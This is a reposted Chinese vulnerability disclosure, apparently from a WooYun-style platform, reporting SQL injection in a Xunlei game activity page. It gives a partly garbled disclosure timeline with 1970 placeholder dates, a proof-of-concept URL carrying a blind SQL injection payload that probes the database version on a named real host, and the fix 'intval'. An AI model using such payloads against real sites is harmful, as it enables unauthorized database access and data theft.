迅雷某页面存在sql注入漏洞
生活随笔
收集整理的這篇文章主要介紹了
迅雷某页面存在sql注入漏洞
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
漏洞詳情
披露狀態(tài):
2010-07-21: 細(xì)節(jié)已通知廠商并且等待廠商處理中
1970-01-01: 廠商已經(jīng)確認(rèn),細(xì)節(jié)僅向廠商公開
1970-01-11: 細(xì)節(jié)向核心白帽子及相關(guān)領(lǐng)域?qū)<夜_
1970-01-21: 細(xì)節(jié)向普通白帽子公開
1970-01-31: 細(xì)節(jié)向?qū)嵙?xí)白帽子公開
2010-08-20: 細(xì)節(jié)向公眾公開
簡要描述:
可以做判斷、使用函數(shù)等,更多利用請自行分析
詳細(xì)說明:
game頻道下某活動頁面
漏洞證明:
http://active.game.xunlei.com/moli/preview.php?id=862/%28cAse%20wHeN%20substRing%28verSion%28%29,1,1%29=5%20THen%201%20Else%200%20End%29
修復(fù)方案:
intval
總結(jié)
以上是生活随笔為你收集整理的迅雷某页面存在sql注入漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: JS加密方式
- 下一篇: 八大古都大排名(权威版)